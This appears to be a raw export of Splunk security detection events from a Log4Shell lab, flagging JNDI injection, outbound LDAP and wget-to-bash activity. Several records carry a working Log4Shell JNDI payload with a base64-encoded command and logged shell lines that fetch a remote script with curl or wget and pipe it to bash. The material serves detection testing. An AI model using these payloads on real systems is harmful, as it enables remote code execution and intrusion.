In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640953, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="PR.DS", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", 
annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640953, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="PR.DS", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", 
latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640952, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="CIS 16", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="DE.CM", annotations._all="Exploitation", annotations._all="CIS 5", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget 
https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640915, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
